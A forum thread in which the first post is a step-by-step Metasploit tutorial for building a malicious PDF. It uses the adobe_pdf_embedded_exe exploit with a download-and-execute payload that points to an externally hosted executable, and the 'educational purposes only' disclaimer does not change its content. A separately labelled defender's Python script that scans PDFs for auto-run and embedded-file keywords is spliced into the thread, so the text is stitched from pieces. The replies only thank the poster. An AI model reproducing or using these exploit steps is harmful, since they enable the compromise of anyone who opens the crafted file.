Thread: PDF fileformat exploit ( Tutorial )

  1. #1
    Member
    Join Date: Mar 2010 | Location: SO CAL | Posts: 59

    PDF fileformat exploit ( Tutorial )

    Hello everyone, haven't been here in a while, just wanted to say what's up to everyone and the mods.
    Before I start, I have a question for the mods: why have you disabled most of my privileges?


    This tutorial is for educational purposes only and nothing more. By the way, if you try to use this exploit, good luck: it's picked up by all major AV vendors.


    More File Format exploit tutorial here Enc0de's blog: File Format tutorial exploits (PDF/Office)

    This tutorial with pictures here Enc0de's blog: Adobe PDF Embedded EXE (Adobe Reader v8.x, v9.x)



    ====Let's get started====


    The exploit I will be using in this tutorial will only affect Adobe Reader v8.x, v9.x (Windows XP SP3 English).


    First you need an exe file you wish to link to the PDF exploit. I will be using calc.exe; you can use anything you like. Now once you have figured out what file you want the PDF exploit to download and execute, go ahead and upload it to ripway. After all that is done and ready, start up Metasploit.


    I always recommend running an update first.

    Code:
    svn up

    Once the update is completed run this to pick the exploit.

    Code:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe

    Now once we have launched the correct exploit, let's run show options to see what it requires from us in order to generate the PDF.

    Code:
    show options

    Now from looking at the picture we see we need to input a PDF file, so go ahead and download whatever one you would like. Once you get the PDF file you want to insert, please keep it in your /root/ directory to keep it simple.

    Now I found one that I want to use, so I will place it on my desktop and name it IN.pdf. Now once it's on the desktop, let's insert the correct location of the PDF in Metasploit.

    Code:
    set INFILENAME /root/IN.pdf


    OK, now we need to pick a payload, and the one we are going to be using is the download execute payload.

    Code:
    set payload windows/download_exec
    
    show options

    OK, you see the highlighted part in white; this was added by inserting the download execute payload. Now I hope you have uploaded the file you want the PDF to download and execute; if not, go ahead and do so.

    Once you get the link we insert it like this.

    hxxp://h1.ripway.com/Hrevolution/calc.exe

    Code:
    set url hxxp://h1.ripway.com/Hrevolution/calc.exe

    Then all you need to do is just type exploit

    Code:
    exploit

    Stand up and be counted as a linux user.
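
For defenders, a triage check for the kind of file the tutorial above produces (a PDF carrying an embedded executable), as an added example that is not part of the original post. It assumes the standard PDF name keywords /OpenAction, /AA, /Launch, /EmbeddedFile, /JavaScript and /JS as indicators; the function names, verdict labels and sample bytes are constructed for illustration.

```python
import re

# Standard PDF name keywords that matter for an "embedded EXE" style document.
AUTO_RUN = ("/OpenAction", "/AA")                            # fire when the file opens
ACTIVE = ("/Launch", "/EmbeddedFile", "/JavaScript", "/JS")  # carry or start code

# A PDF name is "/" followed by anything up to whitespace or a delimiter.
NAME_RE = re.compile(rb"/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalize_name(raw: bytes) -> str:
    """Decode #xx escapes so an obfuscated /L#61unch counts as /Launch."""
    decoded = HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")

def triage_pdf(data: bytes) -> dict:
    """Count flagged names in the raw bytes of a PDF."""
    counts = {name: 0 for name in AUTO_RUN + ACTIVE}
    for match in NAME_RE.finditer(data):
        name = normalize_name(match.group(0))
        if name in counts:
            counts[name] += 1
    return counts

def verdict(counts: dict) -> str:
    """block: auto-run trigger plus active content; review: active content only."""
    auto = any(counts[n] for n in AUTO_RUN)
    active = any(counts[n] for n in ACTIVE)
    if auto and active:
        return "block"
    return "review" if active else "pass"

# Constructed sample fragments (not real documents, not from the thread).
BENIGN = b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
SUSPECT = (b"1 0 obj << /Type /Catalog /OpenAction 5 0 R >> endobj\n"
           b"5 0 obj << /S /L#61unch >> endobj\n"
           b"7 0 obj << /Type /EmbeddedFile /Length 0 >> endobj\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, verdict(triage_pdf(sample)), triage_pdf(sample))
```

A raw byte scan does not see names inside compressed object streams or encrypted documents, so a "pass" here only means nothing was visible in the clear.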

  2. #2
    scottm99 (Good friend of the forums)
    Join Date: Feb 2010 | Location: underwater | Posts: 371

    Re: PDF fileformat exploit ( Tutorial )

    I haven't done much with PDF exploits in Metasploit lately, so this tutorial will be just the thing to refresh my memory. Thanks.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  3. #3
    thorin (My life is this forum)
    Join Date: Jan 2010 | Posts: 2,629

    Re: PDF fileformat exploit ( Tutorial )

    For anyone else digging or re-digging into this like scottm99, you might wanna check out Didier Stevens' blog; he's got lots of great PDF stuff:
    http://blog.didierstevens.com/
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    scottm99 (Good friend of the forums)
    Join Date: Feb 2010 | Location: underwater | Posts: 371

    Re: PDF fileformat exploit ( Tutorial )

    Appreciate the link, thorin. There's some good stuff on his blog.
